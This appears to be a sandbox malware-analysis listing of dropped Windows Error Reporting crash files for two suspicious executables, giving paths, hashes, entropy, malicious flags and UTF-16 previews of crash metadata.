                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.4.5.9.6.5.6.7.1.7.8.8.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.1.4.5.2.7.7.a.-.e.9.b.d.-.4.6.c.5.-.b.c.6.a.-.b.5.8.1.7.4.2.e.3.b.6.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.2.5.e.a.e.7.7.-.1.0.3.f.-.4.a.a.c.-.b.e.1.3.-.3.2.d.f.e.4.6.0.f.0.a.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.P.I.O.W.6.y.o.P.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.4.c.-.0.0.0.1.-.0.0.1.5.-.9.3.3.5.-.6.8.6.d.e.7.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.3.c.1.0.7.c.7.f.2.c.e.8.c.d.f.f.8.8.4.b.a.e.5.d.1.5.8.b.2.1.a.0.0.0.0.f.f.f.f.!.0.0.0.0.f.6.b.f.5.1.b.2.b.c.c.c.9.1.4.7.6.1.3.6.e.4.3.a.9.1.b.1.7.0.7.6.e.d.7.8.b.0.8.3.!.y.P.I.O.W.6.y.o.P.i...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.y.P.I.O.W.6.y.o.P.i...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_yPIOW6yoPi.exe_fd4b28536be3f5f250312b9457878378f496af_1752a2a0_83c67f10-09d1-4f5e-bb02-5897b429db17\Report.wer

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.9375582905119481
                                                Encrypted:false
                                                SSDEEP:192:wUpYdIHpzpzIypS056rep3pjjR4ZrPLzuiFrZ24IO8bpwpt:pCIH9dIyn56reJtjKzuiFrY4IO8buT
                                                MD5:8C1A502C47B0216D2302BCB267AB78F6
                                                SHA1:8BB7E37B5D82C5D5E2A95918BC572297A8F634F8
                                                SHA-256:55B4AE0F8542AF9DCB1F9B6BB81011E36F65DBD4B95E8F47F25134E28AFDF97B
                                                SHA-512:1F2F4D0D152FA7A4838926A4FBD5CF5FBFDB8F50B2293EBEF5C8CFFF4EC314ACE99753410D8ED9836059BCF59860E8244D93A4F85E1A3236794504C7FDAE33EC
                                                Malicious:true
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.4.5.9.6.3.4.8.3.2.5.2.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.3.c.6.7.f.1.0.-.0.9.d.1.-.4.f.5.e.-.b.b.0.2.-.5.8.9.7.b.4.2.9.d.b.1.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.f.9.d.5.5.d.c.-.d.6.9.d.-.4.a.5.0.-.9.f.a.2.-.7.a.4.c.f.9.6.6.f.1.d.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.P.I.O.W.6.y.o.P.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.4.c.-.0.0.0.1.-.0.0.1.5.-.9.3.3.5.-.6.8.6.d.e.7.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.3.c.1.0.7.c.7.f.2.c.e.8.c.d.f.f.8.8.4.b.a.e.5.d.1.5.8.b.2.1.a.0.0.0.0.f.f.f.f.!.0.0.0.0.f.6.b.f.5.1.b.2.b.c.c.c.9.1.4.7.6.1.3.6.e.4.3.a.9.1.b.1.7.0.7.6.e.d.7.8.b.0.8.3.!.y.P.I.O.W.6.y.o.P.i...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.y.P.I.O.W.6.y.o.P.i...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_yPIOW6yoPi.exe_fd4b28536be3f5f250312b9457878378f496af_1752a2a0_9225f348-fc1c-43e9-969c-f488455d47d0\Report.wer

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.937605307481161
                                                Encrypted:false
                                                SSDEEP:192:bghpYdIHpzpzIypS056rep3pjjR4ZrPLzuiFrZ24IO8bpwpt:MhCIH9dIyn56reJtjKzuiFrY4IO8buT
                                                MD5:DCD300B811E59D055706C054C261E74E
                                                SHA1:811E99CB6A7C73D7DC2499A3F7483260E3C83C64
                                                SHA-256:1DD2789A24B847C16AA7298B77C7B7921AA0DBE5237C24291C978386A51C7AEB
                                                SHA-512:DE2B886220F4C7729FC41678CD16D7B1496F006F76259B73D5E0B81932D17493F4AE8FA2DBBA70732F9806376E47B173BE50D558FFC3B35F1CCF86922C7BB7C9
                                                Malicious:true
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.4.5.9.6.4.7.9.1.4.3.3.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.2.2.5.f.3.4.8.-.f.c.1.c.-.4.3.e.9.-.9.6.9.c.-.f.4.8.8.4.5.5.d.4.7.d.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.8.1.d.0.5.8.4.-.6.1.1.d.-.4.8.5.c.-.b.e.e.8.-.b.a.5.4.7.7.9.7.7.d.e.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.P.I.O.W.6.y.o.P.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.4.c.-.0.0.0.1.-.0.0.1.5.-.9.3.3.5.-.6.8.6.d.e.7.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.3.c.1.0.7.c.7.f.2.c.e.8.c.d.f.f.8.8.4.b.a.e.5.d.1.5.8.b.2.1.a.0.0.0.0.f.f.f.f.!.0.0.0.0.f.6.b.f.5.1.b.2.b.c.c.c.9.1.4.7.6.1.3.6.e.4.3.a.9.1.b.1.7.0.7.6.e.d.7.8.b.0.8.3.!.y.P.I.O.W.6.y.o.P.i...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.y.P.I.O.W.6.y.o.P.i...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_yPIOW6yoPi.exe_fd4b28536be3f5f250312b9457878378f496af_1752a2a0_a4670110-4580-4a73-a4d1-32c5eedad24e\Report.wer

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.9374199248073891
                                                Encrypted:false
                                                SSDEEP:384:WzLZCIH9duyn56reJtjKzuiFrY4IO8buT:a5j56rgjKzuiFrY4IO8
                                                MD5:6CF69656B91DBCC030B3701ACE1FA1C7
                                                SHA1:2398E862907F4E2DD24C93CD16E2A6EBDFB00679
                                                SHA-256:4BC8F303B84FDED29A4F0758C897333C1355A063E77D629CC75CE9E202128447
                                                SHA-512:9BD441F33D33C5367620E800037CF8984520C89C21D1A659DFFF47027B34C6BEAC0614E06874E6A423E5D66FA1A3E6751111619FF7A92C8073078517430B4134
                                                Malicious:true
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.4.5.9.6.1.7.4.9.4.2.1.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.4.6.7.0.1.1.0.-.4.5.8.0.-.4.a.7.3.-.a.4.d.1.-.3.2.c.5.e.e.d.a.d.2.4.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.6.b.9.9.f.7.2.-.d.d.6.f.-.4.e.7.a.-.9.6.d.0.-.d.0.e.6.5.f.6.b.9.a.3.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.P.I.O.W.6.y.o.P.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.4.c.-.0.0.0.1.-.0.0.1.5.-.9.3.3.5.-.6.8.6.d.e.7.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.3.c.1.0.7.c.7.f.2.c.e.8.c.d.f.f.8.8.4.b.a.e.5.d.1.5.8.b.2.1.a.0.0.0.0.f.f.f.f.!.0.0.0.0.f.6.b.f.5.1.b.2.b.c.c.c.9.1.4.7.6.1.3.6.e.4.3.a.9.1.b.1.7.0.7.6.e.d.7.8.b.0.8.3.!.y.P.I.O.W.6.y.o.P.i...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.y.P.I.O.W.6.y.o.P.i...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_yPIOW6yoPi.exe_fd4b28536be3f5f250312b9457878378f496af_1752a2a0_ab7867eb-ccc1-47e5-b15e-9c3a94fe2e36\Report.wer

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.9303943800349092
                                                Encrypted:false
                                                SSDEEP:192:JpYdIHpzpz4ypS056rep3pjjR4ZrPMzuiFrZ24IO8bpwpt7:JCIH9d4yn56reJtjFzuiFrY4IO8buT
                                                MD5:E68323E0E301EFFF6CA7DCB084A8F636
                                                SHA1:9DCA2E95C1927C92B7B624F28640963C03019F7A
                                                SHA-256:FC74544DECF941EF3109BCA7D4F10AA705108826F334C63A2D5AB5C919117862
                                                SHA-512:E205CA44F707B5F6D10CC5EC3A5B4FD5698826AEF4804F3F0299E314C56D54264B873CA1DE5D26CD19A623EECDC2A0D5EDB71A1C4E20093D2F090BEB2D2D9605
                                                Malicious:true
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.4.5.9.6.0.4.5.4.5.1.3.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.b.7.8.6.7.e.b.-.c.c.c.1.-.4.7.e.5.-.b.1.5.e.-.9.c.3.a.9.4.f.e.2.e.3.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.5.3.0.0.5.e.4.-.4.9.b.3.-.4.9.c.a.-.b.d.f.8.-.2.4.3.3.f.7.d.5.a.2.0.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.P.I.O.W.6.y.o.P.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.4.c.-.0.0.0.1.-.0.0.1.5.-.9.3.3.5.-.6.8.6.d.e.7.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.3.c.1.0.7.c.7.f.2.c.e.8.c.d.f.f.8.8.4.b.a.e.5.d.1.5.8.b.2.1.a.0.0.0.0.f.f.f.f.!.0.0.0.0.f.6.b.f.5.1.b.2.b.c.c.c.9.1.4.7.6.1.3.6.e.4.3.a.9.1.b.1.7.0.7.6.e.d.7.8.b.0.8.3.!.y.P.I.O.W.6.y.o.P.i...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.y.P.I.O.W.6.y.o.P.i...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_yPIOW6yoPi.exe_fd4b28536be3f5f250312b9457878378f496af_1752a2a0_f8f41f5e-6227-4ae3-bf1b-518301d54ad4\Report.wer

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.9304746472994024
                                                Encrypted:false
                                                SSDEEP:192:6UpYdIHpzpz6ypS056rep3pjjR4ZrPMzuiFrZ24IO8bpwpt:6UCIH9d6yn56reJtjFzuiFrY4IO8buT
                                                MD5:6DD42C6834AC1F4D606EB24B66A66D8B
                                                SHA1:3F04AA63A85BF9A2CE6CA8F0C70E725B147BB274
                                                SHA-256:147EE33DF9B1515079E438EB8C7B4A73D6C2D0DBB4A368EC9ACC09EFEBC4B60F
                                                SHA-512:29E7143B41FDAFB1081B627100A88E5957519EE830B8CF87F1EC363B231E1ACD6A2E7122D59C72B55F904E5C362CCE33DE67718FC10212BB5DD586A8FA36E68A
                                                Malicious:true
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.4.5.9.5.9.2.7.8.2.9.0.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.8.f.4.1.f.5.e.-.6.2.2.7.-.4.a.e.3.-.b.f.1.b.-.5.1.8.3.0.1.d.5.4.a.d.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.9.c.7.9.2.0.6.-.0.1.5.d.-.4.1.5.a.-.b.f.0.8.-.e.4.2.e.2.2.1.8.8.8.4.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.P.I.O.W.6.y.o.P.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.4.c.-.0.0.0.1.-.0.0.1.5.-.9.3.3.5.-.6.8.6.d.e.7.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.3.c.1.0.7.c.7.f.2.c.e.8.c.d.f.f.8.8.4.b.a.e.5.d.1.5.8.b.2.1.a.0.0.0.0.f.f.f.f.!.0.0.0.0.f.6.b.f.5.1.b.2.b.c.c.c.9.1.4.7.6.1.3.6.e.4.3.a.9.1.b.1.7.0.7.6.e.d.7.8.b.0.8.3.!.y.P.I.O.W.6.y.o.P.i...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.y.P.I.O.W.6.y.o.P.i...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_yavascript.exe_3ada1d2124dd83478d28603eafb8278c3cd43a8_ea442dc3_026179ac-8916-407f-91dc-a5a14972c7f8\Report.wer

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.9430481199281755
                                                Encrypted:false
                                                SSDEEP:96:3amXhJvs1h/oA7Rn6tQXIDcQnc6rCcEhcw3r7+HbHg/TgJ3YOZUXWIOy4Hov9tZZ:zvvQ056rwjR4Zr+NzuiFrZ24IO8a8
                                                MD5:A5B9A76E0EBEBC72750565875B1D3AD2
                                                SHA1:8A7288F097AB6095D69216EFA0FD517855AED1E1
                                                SHA-256:A28DB64A5A306FB12983C3F5F3BE98F2DC57545AE3B8FFA2C72DB4AFDF9878CE
                                                SHA-512:A6ED4504A6EDBB96558F43909C845614E12346559A1C441DE8A571E650D44C3887EA83A748FB41F012E2EC7C84845F59270355466AE1A060114FCE1E2432D38C
                                                Malicious:false
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.4.5.9.7.5.8.1.8.5.1.7.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.2.6.1.7.9.a.c.-.8.9.1.6.-.4.0.7.f.-.9.1.d.c.-.a.5.a.1.4.9.7.2.c.7.f.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.4.0.8.9.7.2.a.-.a.6.3.7.-.4.d.0.6.-.a.1.c.6.-.9.e.3.1.b.2.d.f.1.3.0.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.a.v.a.s.c.r.i.p.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.e.8.-.0.0.0.1.-.0.0.1.5.-.4.0.c.3.-.7.1.7.3.e.7.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.5.c.1.e.b.a.f.9.5.8.1.3.4.e.6.7.4.a.7.a.7.b.d.1.6.3.6.2.9.2.4.0.0.0.0.f.f.f.f.!.0.0.0.0.f.6.b.f.5.1.b.2.b.c.c.c.9.1.4.7.6.1.3.6.e.4.3.a.9.1.b.1.7.0.7.6.e.d.7.8.b.0.8.3.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_yavascript.exe_3ada1d2124dd83478d28603eafb8278c3cd43a8_ea442dc3_6bc045d0-02d5-4a02-89f2-a6a0651423b7\Report.wer

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.9076248951799786
                                                Encrypted:false
                                                SSDEEP:96:tMjXhJF9s1h/oA7Rn6tQXIDcQnc6rCcEhcw3r7+HbHg/TgJ3YOZUXWIOy4Hov9ts:tQvF9Q056rwjR4Zr+UzuiFrZ24IO8a8
                                                MD5:2595AD899D8ECA2C89B26D9BB545ED91
                                                SHA1:2D60475693A8CD1510DC3D3FD18C03E82383A5F3
                                                SHA-256:D03AAE88D458FF2A994317E93C68749F30A0479FC5F825DAC05D13895CBE21BE
                                                SHA-512:C7C2C5C77D0C7F97AC6CE2C47867CB550692E0ED1A7A00587DEC62D99D262955344542717671663D71899D6E2C2A7ABDE9AC05D4B332B47A0827A99717035AB6
                                                Malicious:false
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.4.5.9.7.4.1.0.4.0.7.5.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.b.c.0.4.5.d.0.-.0.2.d.5.-.4.a.0.2.-.8.9.f.2.-.a.6.a.0.6.5.1.4.2.3.b.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.b.f.3.3.a.5.0.-.f.e.2.0.-.4.f.d.f.-.8.c.8.5.-.d.3.7.1.f.4.1.9.c.c.5.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.a.v.a.s.c.r.i.p.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.e.8.-.0.0.0.1.-.0.0.1.5.-.4.0.c.3.-.7.1.7.3.e.7.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.5.c.1.e.b.a.f.9.5.8.1.3.4.e.6.7.4.a.7.a.7.b.d.1.6.3.6.2.9.2.4.0.0.0.0.f.f.f.f.!.0.0.0.0.f.6.b.f.5.1.b.2.b.c.c.c.9.1.4.7.6.1.3.6.e.4.3.a.9.1.b.1.7.0.7.6.e.d.7.8.b.0.8.3.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_yavascript.exe_3ada1d2124dd83478d28603eafb8278c3cd43a8_ea442dc3_781d5b2c-740b-40ff-8110-596b8b9678ba\Report.wer

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.9077335567353353
                                                Encrypted:false
                                                SSDEEP:96:A0RXhJxs1h/oA7Rn6tQXIDcQnc6rCcEhcw3r7+HbHg/TgJ3YOZUXWIOy4Hov9tZ+:hxvxQ056rwjR4Zr+UzuiFrZ24IO8a8
                                                MD5:08757A26A1D932A0C44F9CEBC8133947
                                                SHA1:542EFE781DE972A771F6D9EFF5947113D8C4D843
                                                SHA-256:A2821B26B8FEF43B0FF563ED642226E494A9A01D5216D2BC0472F660937A07E2
                                                SHA-512:C6C847A6980638CF516A6217AE9265A99B9F92606017EC0DA71A135D2B54078DDBDD0A11D3AF23045E07E0E44A9404AFC4F136BE83CF7B8D2BFD823583C07015
                                                Malicious:false
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.4.5.9.7.1.5.4.3.3.7.6.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.8.1.d.5.b.2.c.-.7.4.0.b.-.4.0.f.f.-.8.1.1.0.-.5.9.6.b.8.b.9.6.7.8.b.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.3.4.0.4.4.5.2.-.4.f.8.6.-.4.6.2.7.-.b.5.6.0.-.f.a.8.e.2.1.6.4.3.8.a.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.a.v.a.s.c.r.i.p.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.e.8.-.0.0.0.1.-.0.0.1.5.-.4.0.c.3.-.7.1.7.3.e.7.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.5.c.1.e.b.a.f.9.5.8.1.3.4.e.6.7.4.a.7.a.7.b.d.1.6.3.6.2.9.2.4.0.0.0.0.f.f.f.f.!.0.0.0.0.f.6.b.f.5.1.b.2.b.c.c.c.9.1.4.7.6.1.3.6.e.4.3.a.9.1.b.1.7.0.7.6.e.d.7.8.b.0.8.3.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_yavascript.exe_3ada1d2124dd83478d28603eafb8278c3cd43a8_ea442dc3_8517f58d-bc75-442d-86f3-9222e589eca9\Report.wer

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.9078160015063432
                                                Encrypted:false
                                                SSDEEP:96:qJaVXhJMs1h/oA7Rn6tQXIDcQnc6rCcEhcw3r7+HbHg/TgJ3YOZUXWIOy4Hov9ts:UYvMQ056rwjR4Zr+UzuiFrZ24IO8a8
                                                MD5:C7108C5CDD46FF21F8506B890E1C500A
                                                SHA1:311026B0B7EF48C01127B482671390A23ABF5B85
                                                SHA-256:0FE313BAA29D09AF21059ABD7B15B8C6969D8C99547D823551F43E66D8C5D559
                                                SHA-512:31B933DDA74694C808E31658D22921B3DEF08BD8CBB283055906AEA43405A20A32F004E8622C7B78517063EB511F35E444EFE11E855F83B07B1B72142CE7065C
                                                Malicious:false
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.4.5.9.7.0.4.7.3.7.5.9.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.5.1.7.f.5.8.d.-.b.c.7.5.-.4.4.2.d.-.8.6.f.3.-.9.2.2.2.e.5.8.9.e.c.a.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.9.d.3.2.a.2.2.-.d.4.c.9.-.4.3.f.6.-.8.e.a.6.-.6.6.f.9.d.a.0.e.b.8.b.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.a.v.a.s.c.r.i.p.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.e.8.-.0.0.0.1.-.0.0.1.5.-.4.0.c.3.-.7.1.7.3.e.7.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.5.c.1.e.b.a.f.9.5.8.1.3.4.e.6.7.4.a.7.a.7.b.d.1.6.3.6.2.9.2.4.0.0.0.0.f.f.f.f.!.0.0.0.0.f.6.b.f.5.1.b.2.b.c.c.c.9.1.4.7.6.1.3.6.e.4.3.a.9.1.b.1.7.0.7.6.e.d.7.8.b.0.8.3.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_yavascript.exe_3ada1d2124dd83478d28603eafb8278c3cd43a8_ea442dc3_e4ea9386-551c-4f98-b367-86f863fb4c76\Report.wer

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.9077390562342458
                                                Encrypted:false
                                                SSDEEP:96:r95PXhJcs1h/oA7Rn6tQXIDcQnc6rCcEhcw3r7+HbHg/TgJ3YOZUXWIOy4Hov9ts:J5vvcQ056rwjR4Zr+UzuiFrZ24IO8a8
                                                MD5:0209A6BE96A7873DE7C74C785CA95761
                                                SHA1:23E7BC270800A31CBE9B645B2291333F92D6BD30
